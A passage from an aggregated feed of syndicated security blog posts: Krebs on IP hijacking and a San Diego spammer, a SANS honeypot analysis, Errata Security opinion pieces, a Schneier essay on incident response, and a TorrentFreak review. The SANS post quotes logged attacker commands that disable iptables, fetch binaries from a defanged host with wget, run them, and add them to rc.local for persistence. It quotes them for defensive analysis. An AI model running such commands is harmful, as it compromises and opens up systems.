Experts say the hijackers also are exploiting a fundamental problem with record-keeping activities of RIPE NCC, the regional Internet registry (RIR) that oversees the allocation and registration of IP addresses for Europe, the Middle East and parts of Central Asia. RIPE is one of several RIRs, including ARIN (which handles mostly North American IP space) and APNIC (Asia Pacific), LACNIC (Latin America) and AFRINIC (Africa).

Ron Guilmette, an anti-spam crusader who is active in numerous Internet governance communities, said the problem is that a network owner in RIPE’s region can hijack Internet addresses that belong to network owners in regions managed by other RIRs, and if the hijackers then claim to RIPE that they’re the rightful owners of those hijacked IP ranges, RIPE will simply accept that claim without verifying or authenticating it.

Worse yet, Guilmette and others say, those bogus entries — once accepted by RIPE — get exported to other databases that are used to check the validity of global IP address routing tables, meaning that parties all over the Internet who are checking the validity of a route may be doing so against bogus information created by the hijacker himself.

“RIPE is now acutely aware of what is going on, and what has been going on, with the blatantly crooked activities of this rogue provider,” Guilmette said. “However, due to the exceptionally clever way that the proprietors of Mega-Spred have performed their hijacks, the people at RIPE still can’t even agree on how to even undo this mess, let alone how to prevent it from happening again in the future.”

And here is where the story perhaps unavoidably warps into Geek Factor 5. For its part, RIPE said in an emailed statement to KrebsOnSecurity that the RIPE NCC has no knowledge of the agreements made between network operators or with address space holders”

“It’s important to note the distinction between an Internet Number Registry (INR) and an Internet Routing Registry (IRR). The RIPE Database (and many of the other RIR databases) combine these separate functionalities. An INR records who holds which Internet number resources, and the sub-allocations and assignments they have made to End Users.

On the other hand, an IRRcontains route and other objects — which detail a network’s policies regarding who it will peer with, along with the Internet number resources reachable through a specific ASN/network. There are 34 separate IRRs globally — therefore, this isn’t something that happens at the RIR level, but rather at the Internet Routing Registry level.”

“It is not possible therefore for the RIRs to verify the routing information entered into Internet Routing Registries or monitor the accuracy of the route objects,” the organization concluded.

Guilmette said RIPE’s response seems crafted to draw attention away from RIPE’s central role in this mess.

“That it is somewhat disingenuous, I think for this RIPE representative to wave this whole mess off as a problem with the
IRRs when in this specific case, the IRR that first accepted and then promulgated these bogus routing validation records was RIPE,” he said.

RIPE notes that network owners can take help reduce the occurrence of IP address hijacking by taking advantage of Resource Certification (RPKI), a free service to RIPE members and non-members that allows network operators to request a digital certificate listing the Internet number resources they hold. This allows other network operators to verify that routing information contained in this system is published by the legitimate holder of the resources. In addition, the system enables the holder to receive notifications when a routing prefix is hijacked, RIPE said.

While RPKI (and other solutions to this project, such as DNSSEC) have been around for years, obviously not all network providers currently deploy these security methods. Erik Bais, a director at A2B Internet BV — a Dutch ISP — said while broader adoption of solutions like RPKI would certainly help in the long run, one short-term fix is for RIPE to block its Internet providers from claiming routes in address ranges managed by other RIRs.

“This is a quick fix, but it will break things in the future for legitimate usage,” Bais said.

According to RIPE, this very issue was discussed at length at the recent RIPE 69 Meeting in London last week.

“The RIPE NCC is now working with the RIPE community to investigate ways of making such improvements,” RIPE said in a statement.

This is a complex problem to be sure, but I think this story is a great reminder of two qualities about Internet security in general that are fairly static (for better or worse): First, much of the Internet works thanks to the efforts of a relatively small group of people who work very hard to balance openness and ease-of-use with security and stability concerns. Second, global Internet address routing issues are extraordinarily complex — not just in technical terms but also because they also require coordination and consensus between and among multiple stakeholders with sometimes radically different geographic and cultural perspectives. Unfortunately, complexity is the enemy of security, and spammers and other ne’er-do-wells understand and exploit this gap as often as possible.

SANS Internet Storm Center, InfoCON: green: Lessons Learn from attacks on Kippo honeypots, (Mon, Nov 10th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

A number of my fellow Handlers have discussed Kippo [1], a SSH honeypot that can record adversarial behaviour, be it human or machine. Normal behaviour against my set of Kippo honeypots is randomly predictable; a mixture of known bad IP ranges, researchers or from behind TOR scanning and probing, would be attackers manually entering information from their jump boxes or home machines.

What caught my eye was a number of separate brute force attacks that succeeded and then manifested the same behaviour, all within a single day.Despite the IP addresses of the scans, the pickup file locations and the downloaded file names being different the captured scripts from the Kippo logs and, more importantly in this case, the hashes were identical for the two files [2] [3] that were retrieved and attempted to run on Kippos fake system

So what? you may ask. I like to draw lessons learnt from this type of honeypot interaction which help provide some tactical and operational intelligence that can be passed other teams to use. Dont limit this type of information gather to just the security teams, for example our friends in audit and compliance need to know what common usernames and passwords are being used in these types of attacks to keep them current and well advised. A single line note on a daily report to the stakeholders for security may being in order if your organisation is running internet facing Linux systems with SSH running port TCP 22 for awareness.

Here are some of the one I detailed that would be passed to the security team.

1) The password 12345 isnt very safe who knew? (implied sarcasm)
2) The adversary was a scripted session with no error checking (see the scripts actions below)
3) The roughly two hours attacks from each unique IP address shows a lack of centralised command and control
4) The malware dropped was being reported in VirusTotal a day before I submitted my copies, so this most likely is a relatively new set of scanning and attacks
5) The target of the attack is to compromise Linux systems
6) The adversary hosting file locations are on Windows systems based in China running HFS v2.3c 291 [4] a free windows web server on port 8889 which has a known Remote Command Execution flaw the owner should probably looked at updating.
7) Running static or dynamic analysis of the captured Linux binaries provided a wealth of further indicators
8) The IP addresses of the scanning and host servers
9) And a nice list of usernames and passwords to be added to the never, ever use these of anything (root/root, root/password, admin/admin etc)

Id normally offer up any captured binaries for further analysis, if the teams had the capacity to do this or dump them through an automated sandbox like Cuckoo [5] to pick out the more obvious indicators of compromise or further pieces of information to research (especially hard coded commands, IP addresses, domain names etc)

If you have any other comments on how to make honeypots collections relevant, please drop me a line!”>Recorded commands by Kippo
service iptables stop
wget hxxp://x.x.x.x:8889/badfile1
chmod u+x badfile1
./ badfile1
cd /tmp
tmp# wget hxxp://x.x.x.x:8889/badfile2
chmod u+x badfile2
./ badfile2
bash: ./ badfile2: command not found
/tmp# cd /tmp
/tmp# echo cd /root//etc/rc.local
cd /root//etc/rc.local
/tmp# echo ./ badfile1/etc/rc.local
./ badfile1/etc/rc.local
/tmp# echo ./ badfile2/etc/rc.local
./ux badfile2/etc/rc.local
/tmp# echo /etc/init.d/iptables stop/etc/rc.local
/etc/init.d/iptables stop/etc/rc.local

[1] Kippo is a medium interaction SSH honeypot designed to log brute force attacks and, most importantly, the entire shell interaction performed by the attacker.

[2] File hash 1 0601aa569d59175733db947f17919bb7
[3] File hash 2 60ab24296bb0d9b7e1652d8bde24280b


(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Errata Security: This Vox NetNeutrality article is wrong

This post was syndicated from: Errata Security and was written by: Robert Graham. Original post: at Errata Security

There is no reasoned debate over NetNeutrality because the press is so biased. An example is this article by Timothy B. Lee at Vox “explaining” NetNeutrality. It doesn’t explain, it advocates.

1. Fast Lanes

Fast-lanes have been an integral part of the Internet since the beginning. Whenever somebody was unhappy with their speeds, they paid money to fix the problem. Most importantly, Facebook pays for fast-lanes, contrary to the example provided.

One prominent example of fast-lanes is “channels” in the local ISP network to avoid congestion. This allows them to provide VoIP and streaming video over their own private TCP/IP network that won’t be impacted by the congestion that everything else experiences. That’s why during prime-time (7pm to 10pm), your NetFlix streams are low-def (to reduce bandwidth), while your cable TV video-on-demand are hi-def.

Historically, these channels were all “MPEG-TS”, transport streams based on the MPEG video standard. Even your Internet packets would be contained inside the MPEG streams on channels.

Today, the situation is usually reversed. New fiber-optic services have TCP/IP network everywhere, putting MPEG streams on top of TCP/IP. They just separate the channels into their private TCP/IP network that doesn’t suffer congestion (for voice and video-on-demand), and the public Internet access that does. Their services don’t suffer congestion, other people’s services do.

The more important fast-lanes are known as “content delivery networks” or “CDNs”. These companies pay ISPs to co-locate servers on their network, putting servers in every major city. Companies like Facebook then pay the CDNs to host their data.

If you monitor your traffic, you’ll see that the vast majority goes to CDNs located in your city. When you access different, often competing companies like Facebook and Apple, your traffic may in fact go to the same IP address of the CDN server.

Smaller companies that cannot afford CDNs most host their content in just a couple locations. Since these locations are thousands of miles from most of their customers, access is slower than CDN hosted content like Facebook. Pay-for-play has, with preferred and faster access, has been an integral part of the Internet since the very beginning.

This demonstrates that the Vox example of Facebook is a complete lie. Their worst-case scenario already exists, and has existed since before the dot-com era even started, and has enabled competition and innovation rather than hindering it.

2. Innovation

Vox claims: “Advocates say the neutrality of the internet is a big reason there has been so much online innovation over the last two decades“.

No, it’s opponents who claim the lack of government regulation is the reason there has been so much online innovation in the last decades.

NetNeutality means sweeping government regulation that forces companies to ask permission first before innovating. NetNeutrality means spending money lobbying for government for special rules, surviving or failing based on the success of paying off politicians rather than surviving or failing based on the own merits.

Take GoGo Inflight broadband Internet service on airplanes. They block NetFlix in favor of their own video streaming service. This exactly the sort of thing that NetNeutrality regulations are supposed to block. However, it’s technically necessary. A single person streaming video form NetFlix would overload the connection for everyone else. To satisfy video customers, GoGo puts servers on the plane for its streaming service — allowing streaming without using the Internet connection to the ground.

If NetNeutrality became law, such things would be banned. But of course, since that would kill Internet service on airplanes, the FCC would immediately create rules to allow this. But then everyone would start lobbying the FCC for their own exceptions. In the end, you’d have the same thing with every other highly regulated industry, where companies with the most lobbying dollars win.

Innovation happens because companies innovate first and ask for permission (or forgiveness) later. A few years ago, Comcast throttled BitTorrent traffic during prime time. NetNeutrality proponents think this is bad, and use it as an example of why we need regulation. But no matter how bad it is, it’s a healthy sign of innovation. Not all innovations are good, sometimes companies will try things, realize they are bad, then stop doing them. Under NetNeutrality regulations, nothing bad will happen ever again, because government regulators won’t allow it. But that also means good innovations won’t happen either — companies won’t be able to freely try them out without regulators putting a stop to it.

Right now, you can start a company like Facebook without spending any money lobbying the government. In the NetNeutrality future, that will no longer be possible. A significant amount of investor money will go toward lobbying the government for favorable regulation, to ask permission.

3. What’s Taking So Long

Vox imagines that NetNeutality is such a good idea that the only thing stopping it is technicalities.

The opposite is true. The thing stopping NetNeutrality is that it’s a horrible idea that kills innovation. It’s not a technical idea, but a political one. It’s pure left-wing wing politics that demands the government run everything. The thing stopping it is right-wing politics that wants the free-market to run things.

The refusal of Vox to recognize that this is a left-wing vs. right-wing debate demonstrates their overwhelming political bias on this issue.

4. FCC Bypassing Congress

The Internet is new and different. If regulating it like a utility is a good idea, then it’s Congress who should pass a law to do this.

What Obama wants to do is bypass congress and seize control of the Internet himself.

5. Opponent’s arguments

Vox gets this partly right, but fundamentally wrong.

The fundamental argument by opponents is that nothing bad is happening now. None of the evil scenarios of what might happen are actually happening now.

Sure, sometimes companies do bad things, but the market immediately corrects. That’s the consequence of permission-free innovation: innovate first, and ask for permission (or forgiveness) later. That sometimes companies have to ask for forgiveness is a good sign.

Let’s wait until Comcast actually permanently blocks content, or charges NetFlix more than other CDNs, or any of the other hypothetical evils, then let’s start talking about the government taking control.

6. Red Tape

Strangling with red-tape isn’t a binary proposition.

What red-tape means is that network access becomes politicized, as only those with the right political connections get to act. What red-tape means is that only huge corporations can afford the cost. If you like a world dominated by big, connected corporations, then you want NetNeutrality regulations.

While it won’t strangle innovation, it’ll drastically slow it down.

7. YouTube

Vox claims that startups like YouTube would have difficulty getting off the ground with NetNeutrality regulation. The opposite is true: companies like YouTube would no longer be able to get off the ground without lobbying the government for permission.

8. Level Playing Field

Vox description of the NetFlix-Comcast situation is completely biased on wrong, taking NetFlix’s and leftist description at face value. It’s not true.

Descriptions of the NetFlix-Comcast issue completely ignore the technical details, but the technical details matter. For one thing, it doesn’t stream “across the Internet”. The long-distance links between cities cannot support that level of traffic. Instead, NetFlix puts servers in every major city to stream from. These servers are often co-located in the same building as Comcast’s major peering points.

In other words, what we are often talking about is how to get video streaming from NetFlix servers from one end of a building to another.

During prime time (7pm to 10pm), NetFlix’s bandwidth requirements are many times greater than all non-video traffic put together. That essentially means that companies like Comcast have to specially engineer their networks just to handle NetFlix. So far, NetFlix has been exploiting loopholes in “peering agreements” designed for non-video traffic in order to get a free ride.

Re-architecting the Internet to make NetFlix work requires a lot of money. Right now, those costs are born by all Comcast subscribers — even those who don’t watch NetFlix. The 90% of customers with low-bandwidth needs are subsidizing those 10% who watch NetFlix at prime time. We like to think of Comcast as having monopolistic power, but it doesn’t. The truth is that Comcast has very little power in pricing. It can’t meter traffic, charging those who abuse the network during prime time to account for their costs. Thus, instead of charging NetFlix abusers directly, it just passes its costs to NetFlix.

Converting the Internet into a public-utility wouldn’t change this. It simply means that instead of fighting in the market place, the Comcast-NetFlix battle would be decided by regulators. And, the result of the decision would be whichever company did the best job lobbying the FCC and paying off politicians — which would probably be Comcast.

Schneier on Security: The Future of Incident Response

This post was syndicated from: Schneier on Security and was written by: moderator. Original post: at Schneier on Security

Security is a combination of protection, detection, and response. It’s taken the industry a long time to get to this point, though. The 1990s was the era of protection. Our industry was full of products that would protect your computers and network. By 2000, we realized that detection needed to be formalized as well, and the industry was full of detection products and services.

This decade is one of response. Over the past few years, we’ve started seeing incident response (IR) products and services. Security teams are incorporating them into their arsenal because of three trends in computing. One, we’ve lost control of our computing environment. More of our data is held in the cloud by other companies, and more of our actual networks are outsourced. This makes response more complicated, because we might not have visibility into parts of our critical network infrastructures.

Two, attacks are getting more sophisticated. The rise of APT (advanced persistent threat)–attacks that specifically target for reasons other than simple financial theft–brings with it a new sort of attacker, which requires a new threat model. Also, as hacking becomes a more integral part of geopolitics, unrelated networks are increasingly collateral damage in nation-state fights.

And three, companies continue to under-invest in protection and detection, both of which are imperfect even under the best of circumstances, obliging response to pick up the slack.

Way back in the 1990s, I used to say that “security is a process, not a product.” That was a strategic statement about the fallacy of thinking you could ever be done with security; you need to continually reassess your security posture in the face of an ever-changing threat landscape.

At a tactical level, security is both a product and a process. Really, it’s a combination of people, process, and technology. What changes are the ratios. Protection systems are almost technology, with some assistance from people and process. Detection requires more-or-less equal proportions of people, process, and technology. Response is mostly done by people, with critical assistance from process and technology.

Usability guru Lorrie Faith Cranor once wrote, “Whenever possible, secure system designers should find ways of keeping humans out of the loop.” That’s sage advice, but you can’t automate IR. Everyone’s network is different. All attacks are different. Everyone’s security environments are different. The regulatory environments are different. All organizations are different, and political and economic considerations are often more important than technical considerations. IR needs people, because successful IR requires thinking.

This is new for the security industry, and it means that response products and services will look different. For most of its life, the security industry has been plagued with the problems of a lemons market. That’s a term from economics that refers to a market where buyers can’t tell the difference between good products and bad. In these markets, mediocre products drive good ones out of the market; price is the driver, because there’s no good way to test for quality. It’s been true in anti-virus, it’s been true in firewalls, it’s been true in IDSs, and it’s been true elsewhere. But because IR is people-focused in ways protection and detection are not, it won’t be true here. Better products will do better because buyers will quickly be able to determine that they’re better.

The key to successful IR is found in Cranor’s next sentence: “However, there are some tasks for which feasible, or cost effective, alternatives to humans are not available. In these cases, system designers should engineer their systems to support the humans in the loop, and maximize their chances of performing their security-critical functions successfully.” What we need is technology that aids people, not technology that supplants them.

The best way I’ve found to think about this is OODA loops. OODA stands for “observe, orient, decide, act,” and it’s a way of thinking about real-time adversarial situations developed by US Air Force military strategist John Boyd. He was thinking about fighter jets, but the general idea has been applied to everything from contract negotiations to boxing–and computer and network IR.

Speed is essential. People in these situations are constantly going through OODA loops in their head. And if you can do yours faster than the other guy–if you can “get inside his OODA loop”–then you have an enormous advantage.

We need tools to facilitate all of these steps:

  • Observe, which means knowing what’s happening on our networks in real time. This includes real-time threat detection information from IDSs, log monitoring and analysis data, network and system performance data, standard network management data, and even physical security information–and then tools knowing which tools to use to synthesize and present it in useful formats. Incidents aren’t standardized; they’re all different. The more an IR team can observe what’s happening on the network, the more they can understand the attack. This means that an IR team needs to be able to operate across the entire organization.
  • Orient, which means understanding what it means in context, both in the context of the organization and the context of the greater Internet community. It’s not enough to know about the attack; IR teams need to know what it means. Is there a new malware being used by cybercriminals? Is the organization rolling out a new software package or planning layoffs? Has the organization seen attacks form this particular IP address before? Has the network been opened to a new strategic partner? Answering these questions means tying data from the network to information from the news, network intelligence feeds, and other information from the organization. What’s going on in an organization often matters more in IR than the attack’s technical details.
  • Decide, which means figuring out what to do at that moment. This is actually difficult because it involves knowing who has the authority to decide and giving them the information to decide quickly. IR decisions often involve executive input, so it’s important to be able to get those people the information they need quickly and efficiently. All decisions need to be defensible after the fact and documented. Both the regulatory and litigation environments have gotten very complex, and decisions need to be made with defensibility in mind.
  • Act, which means being able to make changes quickly and effectively on our networks. IR teams need access to the organization’s network–all of the organization’s network. Again, incidents differ, and it’s impossible to know in advance what sort of access an IR team will need. But ultimately, they need broad access; security will come from audit rather than access control. And they need to train repeatedly, because nothing improves someone’s ability to act more than practice.

Pulling all of these tools together under a unified framework will make IR work. And making IR work is the ultimate key to making security work. The goal here is to bring people, process and, technology together in a way we haven’t seen before in network security. It’s something we need to do to continue to defend against the threats.

This essay originally appeared in IEEE Security & Privacy.

Krebs on Security: Still Spamming After All These Years

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

A long trail of spam, dodgy domains and hijacked Internet addresses leads back to a 37-year-old junk email purveyor in San Diego who was the first alleged spammer to have been criminally prosecuted 13 years ago for blasting unsolicited commercial email.

atballLast month, security experts at Cisco blogged about spam samples caught by the company’s SpamCop service, which maintains a blacklist of known spam sources. When companies or Internet service providers learn that their address ranges are listed on spam blacklists, they generally get in touch with the blacklister to determine and remediate the cause for the listing (because usually at that point legitimate customers of the blacklisted company or ISP are having trouble sending email).

In this case, a hosting firm in Ireland reached out to Cisco to dispute being listed by SpamCop, insisting that it had no spammers on its networks. Upon investigating further, the hosting company discovered that the spam had indeed come from its Internet addresses, but that the addresses in question weren’t actually being hosted on its network. Rather, the addresses had been hijacked by a spam gang.

Spammers sometimes hijack Internet address ranges that go unused for periods of time. Dormant or “unannounced” address ranges are ripe for abuse partly because of the way the global routing system works: Miscreants can “announce” to the rest of the Internet that their hosting facilities are the authorized location for given Internet addresses. If nothing or nobody objects to the change, the Internet address ranges fall into the hands of the hijacker (for another example of IP address hijacking, also known as “network identity theft,” check out this story I wrote for The Washington Post back in 2008).

So who’s benefitting from the Internet addresses wrested from the Irish hosting company? According to Cisco, the addresses were hijacked by Mega-Spred and Visnet, hosting providers in Bulgaria and Romania, respectively. But what of the spammers using this infrastructure?

One of the domains promoted in the spam that caused this ruckus — unmetegulzoo[dot]com — leads to some interesting clues. It was registered recently by a Mike Prescott in San Diego, to the email address That email was used to register more than 1,100 similarly spammy domains that were recently seen in junk email campaigns (for the complete list, see this CSV file compiled by

Enter Ron Guilmette, an avid anti-spam researcher who tracks spammer activity not by following clues in the junk email itself but by looking for patterns in the way spammers use the domains they’re advertising in their spam campaigns. Guilmette stumbled on the domains registered to the Mike Prescott address while digging through the registration records on more than 14,000 spam-advertised domains that were all using the same method (Guilmette asked to keep that telltale pattern out of this story so as not to tip off the spammers, but I have seen his research and it is solid).

persaud-fbOf the 5,000 or so domains in that bunch that have accessible WHOIS registration records, hundreds of them were registered to variations on the Mike Prescott email address and to locations in San Diego. Interestingly, one email address found in the registration records for hundreds of domains advertised in this spam campaign was registered to a “” in San Diego, which also happens to be the email address tied to the Facebook account for one Michael Persaud in San Diego.

Persaud is an unabashed bulk emailer who’s been sued by AOL, the San Diego District Attorney’s office and by anti-spam activists multiple times over the last 15 years. Reached via email, Persaud doesn’t deny registering the domains in question, and admits to sending unsolicited bulk email for a variety of “clients.” But Persaud claims that all of his spam campaigns adhere to the CAN-SPAM Act, the main anti-spam law in the United States — which prohibits the sending of spam that spoofs that sender’s address and which does not give recipients an easy way to opt out of receiving future such emails from that sender.

As for why his spam was observed coming from multiple hijacked Internet address ranges, Persaud said he had no idea.

“I can tell you that my company deals with many different ISPs both in the US and overseas and I have seen a few instances where smaller ones will sell space that ends up being hijacked,” Persaud wrote in an email exchange with KrebsOnSecurity. “When purchasing IP space you assume it’s the ISP’s to sell and don’t really think that they are doing anything illegal to obtain it. If we find out IP space has been hijacked we will refuse to use it and demand a refund. As for this email address being listed with domain registrations, it is done so with accordance with the CAN-SPAM guidelines so that recipients may contact us to opt-out of any advertisements they receive.”

Guilmette says he’s not buying Persaud’s explanation of events.

“He’s trying to make it sound as if IP address hijacking is a very routine sort of thing, but it is still really quite rare,” Guilmette said.

The anti-spam crusader says the mere fact that Persaud has admitted that he deals with many different ISPs both in the US and overseas is itself telling, and typical of so-called “snowshoe” spammers — junk email purveyors who try to avoid spam filters and blacklists by spreading their spam-sending systems across a broad swath of domains and Internet addresses.

“The vast majority of all legitimate small businesses ordinarily just find one ISP that they are comfortable with — one that provides them with decent service at a reasonable prince — and then they just use that” to send email, Guilmette said. “Snowshoe spammers who need lots of widely dispersed IP space do often obtain that space from as many different ISPs, in the US and elsewhere, as they can.”

Persaud declined to say which companies or individuals had hired him to send email, but cached copies of some of the domains flagged by Cisco show the types of businesses you might expect to see advertised in junk email: payday loans, debt consolidation services, and various nutraceutical products.

In 1998, Persaud was sued by AOL, which charged that he committed fraud by using various names to send millions of get-rich-quick spam messages to America Online customers. In 2001, the San Diego District Attorney’s office filed criminal charges against Persaud, alleging that he and an accomplice crashed a company’s email server after routing their spam through the company’s servers. In 2000, Persaud admitted to one felony count (PDF) of stealing from the U.S. government, after being prosecuted for fraud related to some asbestos removal work that he did for the U.S. Navy.

Many network operators remain unaware of the threat of network address hijacking, but as Cisco notes, network administrators aren’t completely helpless in the fight against network-hijacking spammers: Resource Public Key Infrastructure (RPKI) can be leveraged to prevent this type of activity. Another approach known as DNSSEC can also help.

SANS Internet Storm Center, InfoCON: green: Whois someone else?, (Tue, Nov 4th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

A couple of weeks ago, I already covered the situation where a cloud IP address gets re-assigned, and the new owner still sees some of your traffic. Recently, one of our clients had the opposite problem: They had changed their Internet provider, and had held on to the old address range for a decent decay time. They even confirmed with a week-long packet capture that there was no afterglow on the link, and then dismantled the setup.

Until last week, when they got an annoyed rant into their abuse@ mailbox, accusing them of hosting an active spam operation. The guy on duty in the NOC didnt notice the IP address at first (it was still familiar to him), and he triggered their incident response team, who then rather quickly confirmed: Duh, this aint us!

A full 18 months after the old ISP contract expired, it turns out that their entire contact information was still listed in the WHOIS record for that old netblock. After this experience, we ran a quick check on ~20 IP ranges that we knew whose owner had changed in the past two years, and it looks like this problem is kinda common: Four of them were indeed still showing old owner and contact information in whois records.

So, if you change IPs, dont just keep the afterglow in mind, also remember to chase your former ISP until all traces of your contact information are removed from the public records associated with that network.

If you have @!#%%%! stories to share about stale whois information, feel free to use the comments below, or our contacts form.

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

TorrentFreak: Joker is Cool But Not the New Popcorn Time

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

While BitTorrent’s underlying technology has remained mostly unchanged over the past decade, innovators have found new ways to make it more presentable. Torrent clients have developed greatly and private tracker systems such as’s Gazelle have shown that content can be enhanced with superior cataloging and indexing tools.

This is where Popcorn Time excelled when it debuted earlier this year. While it was the same old torrent content underneath, the presentation was streets ahead of anything seen before. With appetites whetted, enthused BitTorrent fans have been waiting for the next big thing ever since.

Recently news circulated of a new service which in several headlines yesterday was heralded as the new Popcorn Time. is a web-based video service with super-clean presentation. It’s premise is straightforward – paste in a magnet link or upload a torrent file from your computer then sit back and enjoy the show.


Not only does Joker work, it does so with elegance. The interface is uncluttered and intuitive and the in-browser window can be expanded to full screen. Joker also provides options for automatically downloading subtitles or uploading your own, plus options for skipping around the video at will.

While these features are enough to please many visitors to the site, the big questions relate to what is going on under the hood.

Popcorn Time, if we’re forced to conduct a comparison, pulls its content from BitTorrent swarms in a way that any torrent client does. This means that the user’s IP address is visible both to the tracker and all related peers. So, has Joker successfully incorporated a torrent client into a web browser to enable live video streaming?

Last evening TF put that question to the people behind Joker who said they would answer “soon”. Hours later though and we’re still waiting so we’ll venture that the short answer is “no”.

Decentralized or centralized? That is the question..

The most obvious clues become evident when comparing the performance of popular and less popular torrents after they’ve been added to the Joker interface. The best seeded torrents not only tend to start immediately but also allow the user to quickly skip to later or earlier parts of the video. This suggests that the video content has been cached already and isn’t being pulled live and direct from peers in a torrent swarm.

Secondly, torrents with less seeds do not start instantly. We selected a relatively poorly seeded torrent of TPB AFK and had to wait for the Joker progress bar to wind its way to 100% before we could view the video. That took several minutes but then played super-smoothly, another indication that content is probably being cached.


To be absolutely sure we’d already hooked up Wireshark to our test PC in advance of initiating the TPB AFK download. If we were pulling content from a swarm we might expect to see the IP addresses of our fellow peers sending us data. However, in their place were recurring IP addresses from blocks operated by the same UK ISP hosting the Joker website.


Joker is a nice website that does what it promises extremely well and to be fair to its creators they weren’t the ones making the Popcorn Time analogies. However, as a free service Joker faces a dilemma.

By caching video itself the site is bound by the usual bandwidth costs associated with functionally similar sites such as YouTube. While Joker provides greater flexibility (users can order it to fetch whichever content they like) it still has to pump video directly to users after grabbing it from torrent swarms. This costs money and at some point someone is going to have to pay.

In contrast, other than running the software download portal and operating the APIs, Popcorn Time has no direct video-related bandwidth costs since the user’s connection is being utilized for transfers. The downside is that users’ IP addresses are visible to the outside world, a problem Joker users do not have.

Finally and to address the excited headlines, comparing Joker to Popcorn Time is premature. The site carries no colorful and easy to access indexes of movies which definitely makes it a lot less attractive to newcomers. That being said, this lack of content curation enhances Joker’s legal footing.

Overall, demand is reportedly high. The developers told TF last evening that they were “overloaded” and were working hard to fix issues. Currently the service appears stable. Only time will tell how that situation develops.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Errata Security: No evidence feds hacked Attkisson

This post was syndicated from: Errata Security and was written by: Robert Graham. Original post: at Errata Security

Former CBS journalist Sharyl Attkisson is coming out with a book claiming the government hacked her computer in order to suppress reporting on Benghazi. None of her “evidence” is credible. Instead, it’s bizarre technobabble. Maybe her book is better, but those with advance copies quoting excerpts  make it sound like the worst “ninjas are after me” conspiracy theory.

Your electronics are not possessed by demons

Technology doesn’t work by magic. Each symptom has a specific cause.

Attkisson says “My television is misbehaving. It spontaneously jitters, mutes, and freeze-frames”. This is not a symptom of hackers. Instead, it’s a common consumer complaint caused by the fact that cables leading to homes (and inside the home) are often bad. My TV behaves like this on certain channels.

She says “I call home from my mobile phone and it rings on my end, but not at the house”, implying that her phone call is being redirected elsewhere. This is a common problem with VoIP technologies. Old analog phones echoed back the ring signal, so the other side had to actually ring for you to hear it. New VoIP technologies can’t do that. The ringing is therefore simulated and has nothing to do with whether it’s ringing on the other end. This is a common consumer complaint with VoIP systems, and is not a symptom of hacking.

She says that her alarm triggers at odd hours in the night. Alarms work over phone lines and will trigger when power is lost on the lines (such as when an intruder cuts them). She implies that the alarm system goes over the VoIP system on the FiOS box. The FiOS box losing power or rebooting in the middle of the night can cause this. This is a symptom of hardware troubles on the FiOS box, or Verizon maintenance updating the box, not hackers.

She says that her computer made odd “Reeeeee” noises at 3:14am. That’s common. For one thing, when computers crash, they’ll make this sound. I woke two nights ago to my computer doing this, because the WiMax driver crashed, causing the CPU to peg at 100%, causing the computer to overheat and for the fan to whir at max speed. Other causes could be the nightly Timemachine backup system. This is a common symptom of bugs in the system, but not a symptom of hackers.

It’s not that hackers can’t cause these problems, it’s that they usually don’t. Even if hackers have thoroughly infested your electronics, these symptoms are still more likely to be caused by normal failure than by the hackers themselves. Moreover, even if a hacker caused any one of these symptoms, it’s insane to think they caused them all.

Hacking is not sophisticated

There’s really no such thing as a “sophisticated hack“. That’s a fictional trope, used by people who don’t understand hacking. It’s like how people who don’t know crypto use phrases like “military grade encryption” — no such thing exists, the military’s encryption is usually worse than what you have on your laptop or iPhone.

Hacking is rarely sophisticated because the simplest techniques work. Once I get a virus onto your machine, even the least sophisticated one, I have full control. I can view/delete all your files, view the contents of your screen, control your mouse/keyboard, turn on your camera/microphone, and so on. Also, it’s trivially easy to evade anti-virus protection. There’s no need for me to do anything particularly sophisticated.

We are experts are jaded and unimpressed. Sure, we have experience with what’s normal hacking, and might describe something as abnormal. But here’s the thing: ever hack I’ve seen has had something abnormal about it. Something strange that I’ve never seen before doesn’t make a hack “sophisticated”.

Attkisson quotes an “expert” using the pseudonym “Jerry Patel” saying that the hack is “far beyond the abilities of even the best nongovernment hackers”. Government hackers are no better than nongovernment ones — they are usually a lot worse. Hackers can earn a lot more working outside government. Government hackers spend most of their time on paperwork, whereas nongovernment hackers spend most of their time hacking. Government hacker skills atrophy, while nongovernment hackers get better and better.

That’s not to say government hackers are crap. Some are willing to forgo the larger paycheck for a more stable job. Some are willing to put up with the nonsense in government in order to be able to tackle interesting (and secret) problems. There are indeed very good hackers in government. It’s just that it’s foolish to assume that they are inherently better than nongovernmental ones. Anybody who says so, like “Jerry Patel”, is not an expert.

Contradictory evidence

Attkisson quotes one expert as saying intrusions of this caliber are “far beyond the the abilities of even the best nongovernment hackers”, while at the same time quoting another expert saying the “ISP address” is a smoking gun pointing to a government computer.

Both can’t be true. Hiding ones IP address is the first step in any hack. You can’t simultaneously believe that these are the most expert hackers ever for deleting log files, but that they make the rookie mistake of using their own IP address rather than anonymizing it through Tor or a VPN. It’s almost always the other way around: everyone (except those like the Chinese who don’t care) hides their IP address first, and some forget to delete the log files.

Attkisson quotes experts saying non-expert things. Patel’s claims about logfiles and government hackers are false. Don Allison’s claims about IP addresses being a smoking gun is false. It may be that the people she’s quoting aren’t experts, or that her ignorance causes her to misquote them.


Attkisson quotes an expert as identifying an “ISP address” of a government computer. That’s not a term that has any meaning. He probably meant “IP address” and she’s misquoting him.

Attkisson says “Suddenly data in my computer file begins wiping at hyperspeed before my very eyes. Deleted line by line in a split second”. This doesn’t even make sense. She claims to have videotaped it, but if this is actually a thing, it sounds like more something kids do to scare people, not what real “sophisticated” hackers do. Update: she has released the video, the behavior is identical to a stuck delete/backspace key, and not evidence of hackers.

So far, none of the quotes I’ve read from the book use any technical terminology that I, as an expert, feel comfortable with.

Lack of technical details

We don’t need her quoting (often unnamed) experts to support her conclusion. Instead, she could just report the technical details.

